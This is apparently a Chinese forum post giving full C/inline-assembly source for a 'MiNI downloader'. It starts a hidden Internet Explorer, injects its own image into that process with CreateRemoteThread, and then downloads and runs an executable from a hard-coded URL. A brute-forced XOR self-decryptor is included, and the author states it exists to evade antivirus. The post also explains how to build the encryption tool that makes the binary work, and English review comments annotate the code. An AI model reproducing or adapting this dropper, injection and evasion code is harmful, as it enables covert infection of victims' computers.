更新部份:
增加代码 XOR 解密功能,以逃过杀毒软件。(实现见下面的 decrpt 函数:单字节密钥不存放在文件里,而是从 1 到 0xFF 逐个尝试,每次解密后在 __try 中调用 main,密钥错误导致的异常由 SEH 吞掉后再试下一个密钥。)
要生成可用的 MiNI 下载者,则需要自己做一个加密工具:读懂代码后,把编译产物中从 download 起到 decrpt 之前的代码(若链接器按源码顺序排列函数,则也包含 main)用同一个 1..0xFF 的单字节密钥整体 XOR 加密即可。注意 decrpt 的循环从 1 开始,密钥 0 不会被尝试,所以未加密的编译产物本身不能正常运行。
参考delphi版本的下载者源代码,编出来有16K左右。压缩也有10K多,
于是写了VC的代码。按以下的设置,编译出来2K左右。
还可以再设置一下编译开关,以减小体积。Ps:原代码中 4 处没有对 \ 转义,以下代码已补上转义,编译通过;
默认编译出来 16K,取消下面 4 行 #pragma comment(linker, ...) 的注释后,编译后 3K(编译环境:Win2003+VC6.0)
/*
"mini_downloader"
code by kardinal p.s.t
compile by vc++ 6.0
cannot run under Win98;
*/
#include <windows.h>
#pragma comment(lib,"user32.lib")   // FindWindow / GetWindowThreadProcessId used in main()
#pragma comment(lib,"kernel32.lib")
//#pragma comment(linker, "/OPT:NOWIN98") // Author's note: uncomment these 4 lines to get a ~2K binary
//#pragma comment(linker, "/merge:.data=.text")
//#pragma comment(linker, "/merge:.rdata=.text")
//#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/ENTRY:decrpt")      // entry point is decrpt(), not main(): no CRT start-up runs; decrpt() calls main() itself
#pragma comment(linker, "/subsystem:windows") // GUI subsystem: no console window is created
#pragma comment(linker, "/BASE:0x13150000")   // fixed base; main() copies this image into IE at the same address (VirtualAllocEx at Module), so nothing is relocated
// Function pointers resolved at run time with LoadLibrary/GetProcAddress (in download()
// and main() below) instead of static imports — presumably so the API names stay out of
// the import table. main() copies the whole image into the IE process and download()
// runs there, so the copy has its own instance of these globals and re-resolves them.
HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );// ShellExecuteA from shell32.dll, resolved in download()
DWORD (WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);// URLDownloadToFileA from urlmon.dll, resolved in download()
HANDLE (WINAPI *MYINJECT) (HANDLE, LPSECURITY_ATTRIBUTES, DWORD,LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD); // CreateRemoteThread from kernel32.dll, resolved in main()
HANDLE processhandle; // handle to the IE process opened with PROCESS_ALL_ACCESS in main()
DWORD pid;            // PID of that IE process, filled by GetWindowThreadProcessId in main()
HINSTANCE hshell,hurlmon,hkernel; // module handles returned by LoadLibrary; never released with FreeLibrary
// Payload routine, executed as the remote thread entry inside the IE process after
// main() has copied this whole image there (VirtualAllocEx at the same base address,
// WriteProcessMemory, CreateRemoteThread with entrypoint = &download). It is therefore
// self-contained: it resolves its own imports and never returns.
// On disk this function's bytes are expected to be XOR-encrypted; decrpt() restores
// them in place before main() — and thus this code — runs.
// NOTE(review): nothing is checked. A failed LoadLibrary/GetProcAddress turns the
// calls below into calls through a NULL function pointer, and a failed download still
// hands the (possibly absent) file path to ShellExecuteA.
void download()
{
hshell=LoadLibrary("Shell32.dll");
hurlmon=LoadLibrary("urlmon.dll");
(FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");
(FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");
// URLDownloadToFileA: fetch the hard-coded URL to a fixed path in the root of C:
DOWNFILE(NULL,"http://www.testtest.ac.cn/eeeeeeeeeeeeee ... eeeeen/notepad.exe","c:\\ieinst12.exe",0, NULL);
// ShellExecuteA "open" on the downloaded file; nShowCmd 5 = SW_SHOW
SHELLRUN(0,"open","c:\\ieinst12.exe",NULL,NULL,5);
ExitProcess(0); // terminates the hosting process (the injected IE), not just this thread
};
// Injector. Not the real entry point: decrpt() calls it (see /ENTRY:decrpt) once
// download() has been decrypted in place. Launches a hidden IE, copies this entire
// image into that process at the same base address, and starts download() there as
// a remote thread. No return value of any API call below is checked.
void main()
{
//1. Build the IE path and launch it hidden.
char iename[MAX_PATH],iepath[MAX_PATH];
ZeroMemory(iename,sizeof(iename));
ZeroMemory(iepath,sizeof(iepath));
GetWindowsDirectory(iepath,MAX_PATH);
strncpy(iename,iepath,3); // keep only the drive prefix, e.g. "C:\" (assumes a drive-letter path)
strcat(iename,"program files\\Internet Explorer\\IEXPLORE.EXE"); // hard-coded English-locale path; a localized or relocated install is not found
WinExec(iename,SW_HIDE); // launched hidden; failure is not checked
Sleep(500);
//2. Find IE's top-level window and open its process.
// NOTE(review): the fixed 500 ms delay is a race — FindWindow returns NULL if IE is not
// up yet, and may instead return a window of an IE instance that was already running.
// None of the three calls is checked, so processhandle can be NULL from here on.
HWND htemp;
htemp=FindWindow("IEFrame",NULL);
GetWindowThreadProcessId(htemp,&pid);
processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
//3. Reserve memory in IE at this image's own base address.
HMODULE Module;
LPVOID NewModule;
DWORD Size;
LPDWORD lpimagesize; // declared as a pointer but used to hold the SizeOfImage value (cast back to DWORD below)
Module = GetModuleHandle(NULL); // base address of this process's own image
// Read SizeOfImage straight out of the in-memory PE header:
//   [Module+0x3c] = e_lfanew (offset of IMAGE_NT_HEADERS), +0x50 = OptionalHeader.SizeOfImage (32-bit PE layout).
_asm
{
push eax;
push ebx;
mov ebx,Module;
mov eax,[ebx+0x3c];
lea eax,[ebx+eax+0x50];
mov eax,[eax]
mov lpimagesize,eax;
pop ebx;
pop eax;
};
Size=(DWORD)lpimagesize;
// The copy is requested at the same address as the original (lpAddress = Module) so that
// no relocation is needed — presumably the reason for the unusual /BASE:0x13150000 above.
// If that range is already in use inside IE the call returns NULL, which is not checked.
// The region is mapped RWX.
NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
//4. Copy the image (as it currently is in memory, i.e. already decrypted) into IE and start download() there.
WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);
LPTHREAD_START_ROUTINE entrypoint;
// entrypoint = &download; this address is valid inside IE only because the copy sits at the same base.
__asm
{
push eax;
lea eax,download;
mov entrypoint,eax;
pop eax
}
hkernel=LoadLibrary("KERNEL32.dll");
(FARPROC&)MYINJECT= GetProcAddress(hkernel,"CreateRemoteThread");
// Remote thread in IE running download(); Module is passed as the thread parameter, which download() ignores.
// The returned thread handle is discarded (leaked).
MYINJECT(processhandle, NULL, 0, entrypoint, Module, 0, NULL);
//5. Release the process handle.
CloseHandle(processhandle);
return;
} ;
// Decryptor — the program's entry point (see /ENTRY:decrpt above)
// Program entry point (/ENTRY:decrpt): in-place XOR decryptor for the code that precedes
// it, combined with a brute-force key search.
// Region handled: from the start of download() up to the start of decrpt() — with
// functions laid out in source order that is download() and main() together. The
// single-byte key is not stored anywhere; every key 1..0xFF is tried in turn and a wrong
// key is only detected by main() faulting under __try/__except.
// NOTE(review):
//  - shellcode[500] receives (decrpt - download) bytes with no bound check; a larger
//    build overflows the stack buffer.
//  - VirtualProtectEx unprotects exactly 0x1000 bytes from &download; the region must
//    not extend beyond that or the write-back faults.
//  - A wrong key does not necessarily fault immediately: each attempt executes the
//    XOR'd bytes as machine code in this process, and whatever main() did before the
//    fault is not rolled back.
//  - Key 0 is never tried, so the plain compiled binary only works after the region has
//    been XOR-encrypted with a key in 1..0xFF.
void decrpt()
{
HANDLE myps;
DWORD oldAttr;
BYTE shellcode[500]; // stack copy of the (still encrypted) region
ZeroMemory(shellcode,sizeof(shellcode));
myps=GetCurrentProcess();
::VirtualProtectEx(myps,&download,0x1000,PAGE_EXECUTE_READWRITE,&oldAttr); // make the code page writable for the self-modification below; result unchecked
// Step 1: copy the bytes [download, decrpt) into shellcode.
// ecx = decrpt - download; the loop is dec/jne, so a zero-length region would wrap around.
_asm
{
pushad;
lea esi,download
lea edi,shellcode;
lea ecx,decrpt;
sub ecx,esi;
en1:
lodsb;
stosb;
dec ecx;
jne en1;
popad;
};
// Step 2: for each candidate key, write (shellcode XOR key) back over [download, decrpt)
// and try to run main(). The first key under which main() returns normally ends the search.
int i;
for (i=1;i<=0xFF;i++)
{
// bl = current key; every byte of the saved copy is XOR'd with it and stored back into the code.
_asm
{
pushad;
lea esi,shellcode;
lea edi,download;
lea ecx,decrpt;
sub ecx,edi;
en2:
lodsb;
mov ebx,i;
xor al,bl;
stosb;
dec ecx;
jne en2;
popad;
};
// Author's claim: this try/except brute-force structure is what keeps generic AV from flagging the file as a virus.
__try
{
main(); // run the injector on the freshly decrypted code; expected to fault for a wrong key
return;
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
// wrong key (or any other fault inside main()): swallow it and try the next key
};
}
return; // reached only if no key made main() return normally
};